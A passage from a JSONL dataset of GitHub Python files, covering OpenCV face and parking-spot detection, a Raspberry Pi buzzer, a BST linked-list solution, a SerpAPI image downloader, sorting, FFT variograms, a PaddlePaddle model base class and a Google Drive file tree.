data\r\n\r\n    def detectFace(self, img):\r\n        self.data[\"flag\"] = False\r\n        self.data[\"image\"] = img \r\n        grayImg = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) #convert the image to grayscale\r\n        color = (0, 255, 0)\r\n        face_classifier = cv2.CascadeClassifier(\r\n            cv2.data.haarcascades + \"haarcascade_frontalface_default.xml\")\r\n        faceRects = face_classifier.detectMultiScale(\r\n            grayImg, scaleFactor=1.25, minNeighbors=3, minSize=(32, 32)) #run face detection\r\n\r\n        if len(faceRects): #if any face was detected\r\n            self.data[\"flag\"] = True\r\n            for faceRect in faceRects:\r\n                x, y, w, h = faceRect\r\n                cv2.rectangle(img, (x, y), (x + h, y + w), color, 2) #draw a box around the face\r\n                self.data[\"image\"] = img\r\n\r\n        return self.data #return data\r\n","repo_name":"CLoveYC/I-am-watching-you","sub_path":"FaceIn.py","file_name":"FaceIn.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} 
+{"seq_id":"10937014057","text":"import time\nimport RPi.GPIO as GPIO\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(8, GPIO.OUT)\n\n\n\ndef buzz():\n p = GPIO.PWM(8, 6888)\n p.start(0)\n\n for i in range(0, 1):\n for dc in range(0, 101, 5):\n p.ChangeDutyCycle(dc)\n time.sleep(0.04)\n #for dc in range(100, -1, -5):\n # p.ChangeDutyCycle(dc)\n # time.sleeap(0.1)\n p.stop()\n\nif __name__ == \"__main__\":\n buzz()\n","repo_name":"flybirp/raspberry_car","sub_path":"Act/control_buzzer.py","file_name":"control_buzzer.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"553576281","text":"# Definition for a Node.\nclass Node:\n def __init__(self, val, left, right):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def treeToDoublyList(self, root):\n \"\"\"\n\n Convert a BST to a sorted circular doubly-linked list in-place.\n Think of the left and right pointers as synonymous to the previous and next pointers in a doubly-linked list.\n\n Let's take the following BST as an example, it may help you understand the problem better:\n\n\n\n We want to transform this BST into a circular doubly linked list.\n Each node in a doubly linked list has a predecessor and successor.\n For a circular doubly linked list, the predecessor of the first element is the last element, and the successor of the last element is the first element.\n The figure below shows the circular doubly linked list for the BST above.\n The \"head\" symbol means the node it points to is the smallest element of the linked list.\n\n Specifically, we want to do the transformation in place. After the transformation, the left pointer of the tree node should point to its predecessor,\n and the right pointer should point to its successor. We should return the pointer to the first element of the linked list.\n The figure below shows the transformed BST. 
The solid line indicates the successor relationship, while the dashed line means the predecessor relationship.\n\n        :type root: Node\n        :rtype: Node\n        \"\"\"\n\n        if not root:\n            return None\n\n        lhead = self.treeToDoublyList(root.left)\n        rhead = self.treeToDoublyList(root.right)\n\n        if not lhead and not rhead:\n            root.left = root\n            root.right = root\n            return root\n        elif lhead and rhead:\n            lmax_node = lhead.left\n            rmax_node = rhead.left\n            # insert root into the doubly linked list.\n            root.left = lmax_node\n            lmax_node.right = root\n            root.right = rhead\n            rhead.left = root\n\n            # make the circular\n            lhead.left = rmax_node\n            rmax_node.right = lhead\n            return lhead\n        elif lhead:\n            lmax_node = lhead.left\n            root.left = lmax_node\n            lmax_node.right = root\n            lhead.left = root\n            root.right = lhead\n            return lhead\n        elif rhead:\n            rmax_node = rhead.left\n            root.right = rhead\n            rhead.left = root\n            root.left = rmax_node\n            rmax_node.right = root\n            return root\n\n\n\n### Follow up: How to convert a doubly linked list into a balanced BST\n\"\"\"\n1) Get the Middle of the linked list and make it root.\n2) Recursively do same for left half and right half.\n       a) Get the middle of left half and make it left child of the root\n          created in step 1.\n       b) Get the middle of right half and make it right child of the\n          root created in step 1.\n\"\"\"\n\n\n","repo_name":"ljia2/leetcode.py","sub_path":"solutions/tree/426.Convert.Binary.Search.Tree.to.Sorted.Doubly.Linked.List.py","file_name":"426.Convert.Binary.Search.Tree.to.Sorted.Doubly.Linked.List.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"29459183865","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 13 21:36:20 2018\n\n@author: cxs\n\"\"\"\n\nimport cv2\nimport numpy as np\nimport math\n\nclass Getlen:\n    def __init__(self,p1,p2):\n        self.x=p1[0]-p2[0]\n        self.y=p1[1]-p2[1]\n        # use math.sqrt() to take the square root\n        self.len= math.sqrt((self.x**2)+(self.y**2))\n    # function that returns the length of the segment\n    def getlen(self):\n        return self.len\n\ndef detectGarage(img):\n    try:\n        frame = cv2.blur(img,(7,7))\n\n        lower_blue = np.array([70,0,0])\n        upper_blue = np.array([135,255,160])\n        hsv = cv2.cvtColor(frame,cv2.COLOR_BGR2HSV)\n        lot = cv2.inRange(hsv, lower_blue, upper_blue)\n        kernel = np.ones((10,10),np.uint8)\n\n        for _ in range(3):\n            lot = cv2.erode(lot,kernel,iterations = 1)\n            lot = cv2.dilate(lot,kernel,iterations = 1)\n        \n        for _ in range(3):\n            lot = cv2.dilate(lot,kernel,iterations = 1)\n            lot = cv2.erode(lot,kernel,iterations = 1)\n        \n        out_binary, contours, hierarchy = cv2.findContours(lot,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE) \n        max_cnt = 0\n        max_area = 0\n        for cnt in contours:\n            if cv2.contourArea(cnt) < 640*480*0.0025 or cv2.contourArea(cnt) > 640*480*0.95:\n                continue # skip contours that are too small or too large (removing items from the list while iterating it is unsafe)\n            \n            if cv2.contourArea(cnt) > max_area:\n                max_area = cv2.contourArea(cnt)\n                max_cnt = cnt\n        \n        #hull=cv2.convexHull(max_cnt)\n        epsilon=0.05*cv2.arcLength(max_cnt,True)\n        approx=cv2.approxPolyDP(max_cnt,epsilon,True)\n        \n        center_line,center=pointsProcess1(approx)\n        front_center=pointsProcess2(approx)\n        \n        if (abs(center[1]-center_line[1])>=1.0):\n            #The angle between the center line of the parking space and the middle line of the picture\n            err_angle = math.atan ((-1.0*(center[0]-center_line[0])/(center[1]-center_line[1]))) \n        else:\n            err_angle=0\n        \n        sp = lot.shape\n        height = sp[0] # height(rows) of image\n        width = sp[1] # width(columns) of image\n\n        if center[1]<240:\n            err_position =(front_center[0] -width/2)/320.0#The vertical 
distance to the center of the car\n            status=1\n        else:\n            err_position =(center[0] -width/2)/320.0\n            status=2\n        stopFlagDist = Getlen((width/2 , height),center)\n        if(stopFlagDist.getlen() < 70 or center[1]>440):\n            stop = True\n        else:\n            stop = False\n\n        return {'error':False,'stop':stop,'status':status,'err_position':err_position,'err_angle':err_angle}\n    except:\n        return {'error':True,'stop':True} \n\n#get center of the far line and the center of the garage\ndef pointsProcess1(approx):\n    lt_x,lt_y=480,480\n    rt_x,rt_y=480,480\n    sum_x,sum_y,num_p=0,0,0\n    for _ in approx:\n        p=_[0]\n        if p[1]<lt_y:\n            lt_x,lt_y=p[0],p[1]\n        sum_x+=p[0]\n        sum_y+=p[1]\n        num_p+=1\n    for _ in approx:\n        p=_[0]\n        if p[1]>=lt_y and p[0] != lt_x:\n            rt_x,rt_y=p[0],p[1]\n    if (lt_x>rt_x):\n        lt_x,rt_x=rt_x,lt_x\n        lt_y,rt_y=rt_y,lt_y\n    cx,cy=float(sum_x)/num_p,float(sum_y)/num_p\n    return ((lt_x+rt_x)/2,(lt_y+rt_y)/2),(int(cx),int(cy))\n\n    #get center of closer line \ndef pointsProcess2(approx):\n    lt_x,lt_y=0,0\n    rt_x,rt_y=0,0\n    for _ in approx:\n        p=_[0]\n        if p[1]>lt_y:\n            lt_x,lt_y=p[0],p[1]\n    for _ in approx:\n        p=_[0]\n        if p[1]>rt_y and p[1]<=lt_y and p[0] != lt_x:\n            rt_x,rt_y=p[0],p[1]\n    if (lt_x>rt_x):\n        lt_x,rt_x=rt_x,lt_x\n        lt_y,rt_y=rt_y,lt_y\n    return ((lt_x+rt_x)/2,(lt_y+rt_y)/2)\n","repo_name":"zhangciiiii/EI315-PiCar","sub_path":"2/park.py","file_name":"park.py","file_ext":"py","file_size_in_byte":3511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"11831726848","text":"\r\n\"\"\"if you run this code it will prompt you for the keyword to search for,\r\nthen around 20 images matching your keyword will be downloaded locally\"\"\"\r\n\r\nfrom serpapi import GoogleSearch\r\nimport requests,os\r\nfrom PIL import Image\r\nimport io\r\nimport config\r\nimport random\r\n\r\n\r\nsearch_key = input(\"Keyword: \")\r\n\r\nquery = search_key\r\nprint(query)\r\n \r\nparams = {\r\n  \"q\": search_key,\r\n  \"engine\": \"google_images\",\r\n  \"ijn\": random.randint(1,5),\r\n  \"api_key\": config.api_key\r\n}\r\n\r\nsearch = GoogleSearch(params)\r\nresults = search.get_dict()\r\nimages_results = results[\"images_results\"]\r\ncount = 0\r\nresult = []\r\nfor img in range(3):\r\n    result.append(results[\"images_results\"][img][\"original\"])\r\n    if \"gif\" not in result[img].split(\".\"):\r\n        print(result)\r\n        count += 1\r\nprint(count)\r\n\r\n\r\ndef save_images(search_key,image_urls):\r\n    \r\n    min_re=(0,0)\r\n    max_re=(1920,1080)\r\n    for indx,image_url in enumerate(image_urls):\r\n        try:\r\n            search_string = ''.join(e for e in search_key if e.isalnum())\r\n            image = requests.get(image_url,timeout=5)\r\n            if image.status_code == 200:\r\n                with Image.open(io.BytesIO(image.content)) as image_from_web:\r\n                    try:\r\n                        filename = \"%s%s.%s\"%(search_string,str(indx),\r\n                                              image_from_web.format.lower())\r\n                        image_path = os.path.join(r\"C:\\Users\\RAJ\\OneDrive\\Pictures\\New folder\", filename)\r\n                        image_from_web.save(image_path)\r\n                    except OSError:\r\n                        print(\"some exception needs to be done\")\r\n                        rgb_im = image_from_web.convert('RGB')\r\n                        rgb_im.save(image_path)\r\n                    image_resolution = image_from_web.size\r\n                    if image_resolution != None:\r\n                        if image_resolution[0]<min_re[0] or image_resolution[1]<min_re[1] or image_resolution[0]>max_re[0] or image_resolution[1]>max_re[1]:\r\n                            image_from_web.close()\r\n                            os.remove(image_path)\r\n                    image_from_web.close()\r\n        except Exception as e: \r\n            
print(e)\r\n\r\nsave_images(search_key,result)","repo_name":"DeKabilan/Content2Image_Converter","sub_path":"text2img.py","file_name":"text2img.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"27602562010","text":"# The array is virtually split into a sorted and an unsorted part. \n# Values from the unsorted part are picked and placed at the correct position in the sorted part.\n\narray = [7,5,9,0,3,1,6,2,4,8]\n\nfor i in range(1,len(array)):\n    for j in range(i, 0, -1):\n        if array[j] < array[j-1]:\n            array[j], array[j-1] = array[j-1], array[j]\n        else:\n            break\nprint(array)\n\n# Run Time = O(N^2), but much more efficient when the data is almost sorted already.\n","repo_name":"sjyb9394/Python-Study","sub_path":"Algorithm/Sorting/Insertion_Sort.py","file_name":"Insertion_Sort.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"33388407727","text":"\nimport mpstool.img as mpsimg\nimport numpy as np\n\n\ndef distmap(shape):\n    \"\"\"\n    Computes the distance matrix in number of cells. This is used\n    in conjunction with the variogram function.\n    \"\"\"\n    nl = shape[0]\n    nc = shape[1]\n    xx, yy = np.meshgrid(np.arange(0, nl), np.arange(0, nc))\n    xx = xx - nl / 2\n    yy = yy - nc / 2\n    dd = np.sqrt(xx**2 + yy**2)\n    return dd\n\n\ndef buildindicator_(z):\n    \"\"\"\n    Internal function used by fftvariogram() and fftcrossvariogram()\n\n    It builds an indicator function matrix. This matrix contains\n    1 everywhere, and 0 for missing values in the input matrix z.\n    It also replaces NaN with 0 in the original matrix.\n\n    It returns the indicator, and the corrected input.\n    \"\"\"\n    # Builds indicator matrix assuming many 1\n    indic = np.ones(z.shape)\n    # Locates the missing values (NaN)\n    znan = np.isnan(z)\n    indic[znan] = 0 # replace NaN by zero\n    z[znan] = 0 # replace NaN by zero in original data\n    return indic, z\n\n\ndef reduce_matrix_(m, nr, nc, nr2, nc2, nr8, nc8):\n    \"\"\"\n    Internal function used by fftvariogram() to reduce the size\n    of the matrix m, that was expanded to accelerate the fft.\n    Only the relevant data are kept in the final result.\n    \"\"\"\n    g = np.zeros((nr2, nc2))\n    g[0:nr, 0:nc] = m[0:nr, 0:nc]\n    g[0:nr, nc:nc2] = m[0:nr, nc8-nc+1:nc8+1]\n    g[nr:nr2, 0:nc] = m[nr8-nr+1:nr8+1, 0:nc]\n    g[nr:nr2, nc:nc2] = m[nr8-nr+1:nr8+1, nc8-nc+1:nc8+1]\n    g = np.fft.fftshift(g)\n    return g\n\n\ndef fftvariogram(input_image):\n    \"\"\"\n    Computes the variogram map of a 2D image using Fast Fourier Transform\n\n    Parameters\n    ----------\n\n    input_image : numpy array or mps_toolbox image\n        the input image\n\n    Returns\n    -------\n\n    gmap : numpy array\n        the variographic map\n\n    nbpairs : numpy array\n        the number of pairs\n\n    Examples\n    --------\n\n    >>> gmap, npairs = fftvariogram(image)\n\n    Method\n    -------\n\n    Since the computation of a variogram map requires to compute\n    convolution products, it can be accelerated using Fast Fourier Transform.\n    The method was proposed by:\n\n    Marcotte (1996) Fast Variogram Computation with FFT, Computers and\n    Geosciences, 22(10): 1175-1186\n\n    This approach is faster than the traditional spatial shift method\n    when the size of the image is large enough.\n\n    \"\"\"\n\n    # Transform the input into a numpy array\n    if isinstance(input_image, mpsimg.Image):\n        input_image = input_image.asArray()\n\n    # Copy input in array z\n    z = input_image.copy()\n\n    # Image size\n    nr = z.shape[0]\n    nc = 
z.shape[1]\n    if len(z.shape) > 2:\n        tmp = z.shape[2]\n        if tmp > 1:\n            raise ValueError('the input image must be 2D')\n\n    # Ensure proper size before running FFT\n    z.shape = (nr, nc,)\n\n    # Variogram map size\n    nr2 = 2*nr-1\n    nc2 = 2*nc-1\n\n    # Find the closest multiple of 8\n    nr8 = int(np.ceil(nr2 / 8) * 8)\n    nc8 = int(np.ceil(nc2 / 8) * 8)\n\n    # Matrix of ones (used as an indicator function = 0 for missing values)\n    m1, z = buildindicator_(z)\n\n    # Fourier transforms\n    zf = np.fft.fft2(z, (nr8, nc8))\n    z2f = np.fft.fft2(z * z, (nr8, nc8))\n    m1f = np.fft.fft2(m1, (nr8, nc8))\n\n    # Number of pairs\n    npairs = np.round(np.real(np.fft.ifft2(m1f.conjugate() * m1f)))\n    npairs = np.maximum(npairs, 1) # To avoid division by zero\n\n    # Assemble the variogram computation\n    tmp = m1f.conjugate() * z2f + z2f.conjugate() * m1f\n    tmp -= 2 * zf.conjugate() * zf\n    gmap = 0.5 * np.real(np.fft.ifft2(tmp)) / npairs\n\n    # Shift the matrices for readability\n    npairs = reduce_matrix_(npairs, nr, nc, nr2, nc2, nr8, nc8)\n    gmap = reduce_matrix_(gmap, nr, nc, nr2, nc2, nr8, nc8)\n\n    return gmap, npairs\n\n\ndef vario_error(g1, g2, d, npairs):\n    \"\"\"\n    Computes a normalized error between two variogram maps\n\n    The variogram maps are produced for example by the fftvariogram() function.\n    They are centered around the zero lag position.\n\n    Parameters\n    ----------\n\n    g1 : numpy array\n        the first variogram map\n\n    g2 : numpy array\n        the second variogram map\n\n    d : numpy array\n        distance map, the distance is zero for the central location\n        this map can be constructed with the function distmap()\n\n    npairs : numpy array\n        map of the number of pairs for each value in the variogram map\n        this map is returned by the function fftvariogram()\n\n    Returns\n    -------\n\n    error : float\n        the weighted sum of error between the two variogram maps\n\n\n    \"\"\"\n\n    weight = npairs / d**2\n    weight /= np.sum(weight)\n    error = np.abs(g1 - g2) * weight\n    return np.sum(error)\n\n\ndef fftcrossvariogram(input_image1, input_image2):\n    \"\"\"\n    Computes the cross variogram map of two 2D images using FFT\n\n    Parameters\n    ----------\n\n    input_image1 : numpy array or mps_toolbox image\n        the first input image\n\n    input_image2 : numpy array or mps_toolbox image\n        the second input image\n\n    Returns\n    -------\n\n    gmap1 : numpy array\n        the variographic map for the first image\n\n    gmap2 : numpy array\n        the variographic map for the second image\n\n    gmap12 : numpy array\n        the crossvariogram map for the pair of images\n\n    nbpair1 : numpy array\n        the number of pairs for gmap1\n\n    nbpair2 : numpy array\n        the number of pairs for gmap2\n\n    nbpair12 : numpy array\n        the number of pairs for gmap12\n\n\n    Examples\n    --------\n\n    >>> gmap1, gmap2, gmap12, npair1, npair2, npair12 = fftcrossvariogram(image1, image2)\n\n    Method\n    -------\n\n    Since the computation of a variogram map requires to compute\n    convolution products, it can be accelerated using Fast Fourier Transform.\n    The method was proposed by:\n\n    Marcotte (1996) Fast Variogram Computation with FFT, Computers and\n    Geosciences, 22(10): 1175-1186\n\n    This approach is faster than the traditional spatial shift method\n    when the size of the image is large enough.\n\n    \"\"\"\n\n    # Transform the input into a numpy array\n    if isinstance(input_image1, mpsimg.Image):\n        input_image1 = input_image1.asArray()\n\n    # Copy input in array z\n    z = input_image1.copy()\n\n    # Transform the input into a numpy array\n    if isinstance(input_image2, mpsimg.Image):\n        input_image2 = input_image2.asArray()\n\n    # Copy input in array y\n    y = 
input_image2.copy()\n\n    # Image size\n    nr = z.shape[0]\n    nc = z.shape[1]\n\n    if len(z.shape) > 2:\n        tmp = z.shape[2]\n        if tmp > 1:\n            raise ValueError('the input image must be 2D')\n\n    # Ensure proper size before running FFT\n    z.shape = (nr, nc,)\n    y.shape = (nr, nc,)\n\n    # Variogram map size\n    nr2 = 2*nr-1\n    nc2 = 2*nc-1\n\n    # Find the closest multiple of 8\n    nr8 = int(np.ceil(nr2 / 8) * 8)\n    nc8 = int(np.ceil(nc2 / 8) * 8)\n\n    # Construct matrix of 1 for known values and 0 for missing ones\n    idz, z = buildindicator_(z)\n    idy, y = buildindicator_(y)\n\n    # Fourier transforms\n    z1f = np.fft.fft2(z, (nr8, nc8))\n    z2f = np.fft.fft2(z * z, (nr8, nc8))\n    izf = np.fft.fft2(idz, (nr8, nc8))\n\n    y1f = np.fft.fft2(y, (nr8, nc8))\n    y2f = np.fft.fft2(y * y, (nr8, nc8))\n    iyf = np.fft.fft2(idy, (nr8, nc8))\n\n    # cross-components\n    izyf = np.fft.fft2(idz * idy, (nr8, nc8))\n    t1 = np.fft.fft2(z * idy, (nr8, nc8))\n    t2 = np.fft.fft2(y * idz, (nr8, nc8))\n    t12 = np.fft.fft2(z * y, (nr8, nc8))\n\n    # Number of pairs\n    npairz = np.round(np.real(np.fft.ifft2(izf.conjugate() * izf)))\n    npairz = np.maximum(npairz, 1) # To avoid division by zero\n\n    npairy = np.round(np.real(np.fft.ifft2(iyf.conjugate() * iyf)))\n    npairy = np.maximum(npairy, 1)\n\n    npairzy = np.round(np.real(np.fft.ifft2(izyf.conjugate() * izyf)))\n    npairzy = np.maximum(npairzy, 1)\n\n    # Assemble the variogram computation\n    tmp = izf.conjugate() * z2f + z2f.conjugate() * izf\n    tmp -= 2 * z1f.conjugate() * z1f\n    gz = 0.5 * np.real(np.fft.ifft2(tmp)) / npairz\n\n    tmp = iyf.conjugate() * y2f + y2f.conjugate() * iyf\n    tmp -= 2 * y1f.conjugate() * y1f\n    gy = 0.5 * np.real(np.fft.ifft2(tmp)) / npairy\n\n    tmp = izyf.conjugate() * t12 + t12.conjugate() * izyf\n    tmp -= t1.conjugate() * t2 + t2.conjugate() * t1\n    gzy = 0.5 * np.real(np.fft.ifft2(tmp)) / npairzy\n\n    # Shift the matrices for readability\n    npairz = reduce_matrix_(npairz, nr, nc, nr2, nc2, nr8, nc8)\n    npairy = reduce_matrix_(npairy, nr, nc, nr2, nc2, nr8, nc8)\n    npairzy = reduce_matrix_(npairzy, nr, nc, nr2, nc2, nr8, nc8)\n    gz = reduce_matrix_(gz, nr, nc, nr2, nc2, nr8, nc8)\n    gy = reduce_matrix_(gy, nr, nc, nr2, nc2, nr8, nc8)\n    gzy = reduce_matrix_(gzy, nr, nc, nr2, nc2, nr8, nc8)\n\n    return gz, gy, gzy, npairz, npairy, npairzy\n","repo_name":"UniNE-CHYN/mps_toolbox","sub_path":"mpstool/variogram.py","file_name":"variogram.py","file_ext":"py","file_size_in_byte":8756,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"50"} +{"seq_id":"1683742196","text":"import paddle\nimport paddle.nn as nn\nimport collections\nimport numpy as np\n\nfrom parl.core.model_base import ModelBase\nfrom parl.utils import machine_info\n\n__all__ = ['Model']\n\n\nclass Model(nn.Layer, ModelBase):\n    \"\"\"\n    | `alias`: ``parl.Model``\n    | `alias`: ``parl.core.paddle.agent.Model``\n\n    | ``Model`` is a base class of PARL for the neural network. \n    A ``Model`` is usually a policy or Q-value function, which predicts \n    an action or an estimate according to the environmental observation.\n\n    | To use the ``PaddlePaddle2.0`` backend model, user needs to call \n    ``super(Model, self).__init__()`` at the beginning of ``__init__`` \n    function.\n\n    | ``Model`` supports duplicating a ``Model`` instance in a pythonic way:\n\n    | ``copied_model = copy.deepcopy(model)``\n\n    Example:\n\n        .. 
code-block:: python\n\n            import parl\n            import paddle.nn as nn\n\n            class Policy(parl.Model):\n                def __init__(self):\n                    super(Policy, self).__init__()\n                    self.fc = nn.Linear(input_dim=100, output_dim=32)\n\n                def policy(self, obs):\n                    out = self.fc(obs)\n                    return out\n            \n            policy = Policy() \n            copied_policy = copy.deepcopy(policy)\n\n    Attributes:\n        model_id(str): each model instance has its unique model_id.\n\n    Public Functions:\n        - ``sync_weights_to``: synchronize parameters of the current model \n        to another model.\n        - ``get_weights``: return a list containing all the parameters of \n        the current model.\n        - ``set_weights``: copy parameters from ``set_weights()`` to the model.\n        - ``forward``: define the computations of a neural network. **Should** \n        be overridden by all subclasses.\n    \"\"\"\n\n    def __init__(self):\n        super(Model, self).__init__()\n\n    def sync_weights_to(self, target_model, decay=0.0):\n        \"\"\"Synchronize parameters of current model to another model.\n\n        target_model_weights = decay * target_model_weights \n        + (1 - decay) * current_model_weights\n\n        Args:\n            target_model (`parl.Model`): an instance of ``Model`` that has \n            the same neural network architecture as the current model.\n            decay (float): the rate of decline in copying parameters. \n            0 if no parameters decay when synchronizing the parameters.\n\n        Example:\n\n        .. code-block:: python\n\n            import copy\n            # create a model that has the same neural network structures.\n            target_model = copy.deepcopy(model)\n\n            # after initializing the parameters ...\n            model.sync_weights_to(target_model)\n\n        Note:\n            Before calling ``sync_weights_to``, parameters of the model must \n            have been initialized.\n        \"\"\"\n        assert not target_model is self, \"cannot copy between identical model\"\n        assert isinstance(target_model, Model)\n        assert self.__class__.__name__ == target_model.__class__.__name__, \\\n            \"must be the same class for params syncing!\"\n        assert (decay >= 0 and decay <= 1)\n\n        target_vars = dict(target_model.named_parameters())\n        for name, var in self.named_parameters():\n            target_data = decay * target_vars[name] + (1 - decay) * var\n            target_vars[name] = target_data\n        target_model.set_state_dict(target_vars)\n\n    def get_weights(self):\n        \"\"\"Returns a Python dict containing parameters of current model.\n\n        Returns: \n            a Python dict containing the parameters of current model.\n        \"\"\"\n        weights = self.state_dict()\n        for key in weights.keys():\n            weights[key] = weights[key].numpy()\n        return weights\n\n    def set_weights(self, weights):\n        \"\"\"Copy parameters from ``set_weights()`` to the model.\n        \n        Args:\n            weights (dict): a Python dict containing the parameters.\n        \"\"\"\n        old_weights = self.state_dict()\n        assert len(old_weights) == len(\n            weights), '{} params are expected, but got {}'.format(\n                len(old_weights), len(weights))\n        new_weights = collections.OrderedDict()\n        for key in old_weights.keys():\n            assert key in weights, 'key: {} is expected to be in weights.'.format(\n                key)\n            assert old_weights[key].shape == list(\n                weights[key].shape\n            ), 'key \\'{}\\' expects the data with shape {}, but gets {}'.format(\n                key, old_weights[key].shape, list(weights[key].shape))\n            new_weights[key] = paddle.to_tensor(weights[key])\n        self.set_state_dict(new_weights)\n","repo_name":"PaddlePaddle/PARL","sub_path":"parl/core/paddle/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4708,"program_lang":"python","lang":"en","doc_type":"code","stars":3097,"dataset":"github-code","pt":"50"} +{"seq_id":"2833569246","text":"class 
Solution(object):\n def __init__(self):\n self.table = (\n ('I', 1),\n ('IV', 4), ('V', 5),\n ('IX', 9), ('X', 10),\n ('XL', 40), ('L', 50),\n ('XC', 90), ('C', 100),\n ('CD', 400), ('D', 500),\n ('CM', 900), ('M', 1000)\n )\n\n def intToRoman(self, num):\n \"\"\"\n :type num: int\n :rtype: str\n \"\"\"\n r = ''\n i = len(self.table) - 1\n while i >= 0:\n (k, v) = self.table[i]\n while num >= v:\n num -= v\n r += k\n i -= 1\n\n return r\n\n\nif __name__ == '__main__':\n solution = Solution()\n # example 1\n # num = 9\n # example 2\n # \"LVIII\"\n # num = 58\n # example 3\n # \"MCMXCIV\"\n num = 1994\n s = solution.intToRoman(num)\n print(s)\n","repo_name":"yimtcode/LeetCode","sub_path":"algorithms/python/0012_integer-to-roman.py","file_name":"0012_integer-to-roman.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"756620251","text":"import os\nimport pickle\n\nfrom mime_names import TYPES\nfrom utils import load_settings\n\nfrom drive_file import DriveFile\n\nclass DriveTree:\n def __init__(self, service, save_path, root):\n self.save_path = save_path\n if service is None:\n return\n self.root = DriveFile(None, root)\n self.service = service\n self.folders_hash = {}\n self.files_hash = {}\n\n def download(self, destination):\n '''Download all the files from the tree'''\n if not os.path.exists(destination):\n os.mkdir(destination)\n nodes = self.get_root().get_children()\n while nodes:\n node = nodes.pop(0)\n nodes = nodes + node.get_children()\n node.download(destination, self.service, recursive=False)\n\n def find_file(self, node_id):\n if node_id == self.root.get_id():\n return self.root\n return self.find_file_in_parent(self.root, node_id, recursive=True)\n\n def find_file_in_parent(self, parent, node_id, recursive=False):\n for child in parent.get_children():\n if child.get_id() == node_id:\n return child\n\n if recursive and child.get_children():\n ret = self.find_file_in_parent(child, node_id, True)\n if ret and ret.get_id() == node_id:\n return ret\n return None\n\n def get_node_from_id(self, fileId):\n if fileId in self.folders_hash:\n return self.folders_hash[fileId]\n return None\n\n def get_file_count(self):\n return (len(self.files_hash) + len(self.folders_hash))\n\n def get_closest_nodes_from_path(self, path):\n '''Returns a list of all the nodes that are close to the path,\n of the local existing tree. It's a list because it's possible\n to have more than one file with the same name under the same\n parent, as it's not possible to distinguish them by using a\n path string.\n '''\n if path in ['root', '/root', '/root/', 'root/', '/']:\n return [self.root], ''\n path_list = [p for p in path.split('/') if p]\n current_nodes = [self.root]\n depth = 0\n for path1 in path_list:\n last_depth = depth\n for node in list(current_nodes):\n for child in node.get_children():\n if path1 == child.get_name():\n current_nodes.append(child)\n if depth == last_depth:\n depth += 1\n current_nodes.remove(node)\n if depth == last_depth:\n break\n if not current_nodes:\n current_nodes = [self.root]\n return current_nodes, '/'.join(path_list[depth:])\n\n def get_nodes_from_path(self, path, exclusive=True):\n '''It will return a list of nodes that fits the path. 
If exclusive is false,\n all of the files under the same parent will also be added to the tree.\n '''\n closest_nodes, remaining_path = self.get_closest_nodes_from_path(path)\n if remaining_path:\n path_list = [p for p in remaining_path.split('/') if p]\n fields = 'files(name, id, mimeType, parents)'\n for p in path_list:\n for node in list(closest_nodes):\n file_list = self.service.files().list(q="'%s' in parents and trashed = false"\n % node.get_id(),\n fields=fields)\\\n .execute().get('files', [])\n for file1 in file_list:\n if file1['name'] == p:\n closest_nodes.append(DriveFile(node, file1))\n elif not exclusive\\\n and not self.find_file_in_parent(node, file1['id']):\n DriveFile(node, file1)\n closest_nodes.remove(node)\n if not closest_nodes:\n return None\n self.save_to_file()\n return closest_nodes\n\n def get_path_from_id(self, fileId):\n file1 = self.service.files().get(fileId=fileId,\n fields='name, mimeType, parents').execute()\n isfolder = ''\n if file1['mimeType'] == TYPES['folder']:\n isfolder = '/'\n if not 'parents' in file1:\n return '?' + file1['name']\n parent = file1['parents'][0]\n if parent == self.root.get_id():\n return '/' + file1['name'] + isfolder\n\n return self.get_path_from_id(parent) + file1['name'] + isfolder\n\n def get_root(self):\n return self.root\n\n def load_complete_tree(self, filter_enabled=True, complete=True):\n '''Builds two hash tables keyed by file id: folders_hash maps a\n folder id to its node in the tree (e.g. the node for\n /MyDrive/Books/Fiction), while files_hash maps a non-folder file\n id to its DriveFile entry (e.g. Star Wars.pdf).\n\n :param filter_enabled: if whitelist or blacklist is enabled.\n :type filter_enabled: bool.\n :param complete: if True, non-folder files are also linked into the tree.\n :type complete: bool.\n '''\n whitelist = blacklist = None\n if filter_enabled:\n settings = load_settings()\n if settings['whitelist-enabled']:\n whitelist = settings['whitelist-files']\n elif settings['blacklist-enabled']:\n blacklist = settings['blacklist-files']\n\n # =========== debug code ===========\n # just to keep local query to not request files every run\n # if not os.path.exists('folders.dat'):\n # query = 'trashed = false and mimeType = \"%s\"' % TYPES['folder']\n # fields = 'nextPageToken, files(name, id, parents, mimeType, md5Checksum)'\n # folders_metadata = []\n # pageToken = None\n # while True:\n # result = self.service.files().list(q=query,\\\n # fields=fields,\\\n # pageToken=pageToken,\\\n # pageSize=1000).execute()\n # folders_metadata += result.get('files', [])\n # pageToken = result.get('nextPageToken')\n # if not pageToken:\n # break\n # with open('folders.dat', 'wb') as f:\n # pickle.dump(folders_metadata, f, pickle.HIGHEST_PROTOCOL)\n # else:\n # with open('folders.dat', 'rb') as f:\n # folders_metadata = pickle.load(f)\n # =========== debug code ===========\n\n # =========== real code ===========\n query = 'trashed = false and mimeType = \"%s\"' % TYPES['folder']\n folders_metadata = []\n pageToken = None\n while True:\n fields = 'nextPageToken, files(name, id, parents, 